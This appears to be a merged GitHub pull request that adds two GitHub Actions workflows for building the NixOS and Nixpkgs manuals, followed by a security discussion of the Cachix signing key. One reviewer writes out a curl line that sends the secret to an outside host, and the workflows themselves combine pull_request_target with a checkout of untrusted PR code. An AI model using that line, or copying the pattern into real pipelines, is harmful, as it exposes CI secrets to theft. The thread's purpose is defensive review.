Merged
28 changes: 28 additions & 0 deletions .github/workflows/manual-nixos.yml
@@ -0,0 +1,28 @@
name: "Build NixOS manual"

on:
pull_request_target:
branches:
- master
paths:
- 'nixos/**'

jobs:
nixos:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
# pull_request_target checks out the base branch by default
ref: refs/pull/${{ github.event.pull_request.number }}/merge
- uses: cachix/install-nix-action@v12
with:
# explicitly enable sandbox
extra_nix_config: sandbox = true
- uses: cachix/cachix-action@v8
with:
# This cache is for the nixos/nixpkgs manual builds and should not be trusted or used elsewhere.
name: nixpkgs-ci
signingKey: '${{ secrets.CACHIX_SIGNING_KEY }}'
Member

@domenkozar Do you see any way an attacker could extract the signing key in this case?

Member

Anybody with nixpkgs push access can extract the signing key easily.

Push a commit on a branch with curl https://myside.com/${{ secrets.CACHIX_SIGNING_KEY} somewhere in the actions, then enjoy your logs.

We should make sure that nobody consumes that cache except github actions.

Member

I'd suggest deleting the cache and generating a new one managed with auth tokens. That will ensure tokens can be revoked without losing the cache.

On top of that, until we can give committers only merge access and not direct commit access, about 140 people can extract the key. I don't think anyone would do it on purpose, but hacking 1 of 140 GitHub accounts is not infeasible.

I suggest we add an explicit note that the cache should not be trusted outside of CI usage.

Contributor Author

I suggest we add an explicit note that the cache should not be trusted outside of CI usage.

Done.

- name: Building NixOS manual
run: nix-build --option restrict-eval true nixos/release.nix -A manual.x86_64-linux
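Review bot: the `pull_request_target` trigger runs this job with the base repository's secrets, including `CACHIX_SIGNING_KEY`, while the checkout step deliberately switches to `refs/pull/${{ github.event.pull_request.number }}/merge`, so the Nix expressions that the final `nix-build` step evaluates are controlled by the PR author. `sandbox = true` and `--option restrict-eval true` contain the build itself, but the signing key still lives in the same job as that untrusted input; the thread's proposal of a revocable auth token instead of a long-lived signing key is the right fix, and the comment on the cachix step ("should not be trusted or used elsewhere") should stay as the cache's documented status. The `# pull_request_target checks out the base branch by default` comment would be clearer if it also said that the workflow file itself is always taken from the base branch, since that is what keeps the `with:` blocks (and the secret reference) out of PR control. Consider pinning `actions/checkout`, `cachix/install-nix-action` and `cachix/cachix-action` to full commit SHAs rather than the mutable `@v2`, `@v12` and `@v8` tags, because a moved tag would run inside this secret-holding job.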
28 changes: 28 additions & 0 deletions .github/workflows/manual-nixpkgs.yml
@@ -0,0 +1,28 @@
name: "Build Nixpkgs manual"

on:
pull_request_target:
branches:
- master
paths:
- 'doc/**'

jobs:
nixpkgs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
# pull_request_target checks out the base branch by default
ref: refs/pull/${{ github.event.pull_request.number }}/merge
- uses: cachix/install-nix-action@v12
with:
# explicitly enable sandbox
extra_nix_config: sandbox = true
- uses: cachix/cachix-action@v8
with:
# This cache is for the nixos/nixpkgs manual builds and should not be trusted or used elsewhere.
name: nixpkgs-ci
signingKey: '${{ secrets.CACHIX_SIGNING_KEY }}'
- name: Building Nixpkgs manual
run: nix-build --option restrict-eval true pkgs/top-level/release.nix -A manual
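Review bot: apart from the `paths` filter (`doc/**`), the job name and the release attribute (`pkgs/top-level/release.nix -A manual`), this file duplicates manual-nixos.yml line for line, including the `pull_request_target` checkout of the PR merge ref and the inline `CACHIX_SIGNING_KEY` reference. Whatever is decided for the key in the other file (auth token instead of signing key, pinned action SHAs, the "not trusted outside CI" wording) has to be mirrored here, so it would be simpler to keep a single workflow with two jobs, so that the secret handling and the cache comment are defined once and cannot drift between the two files.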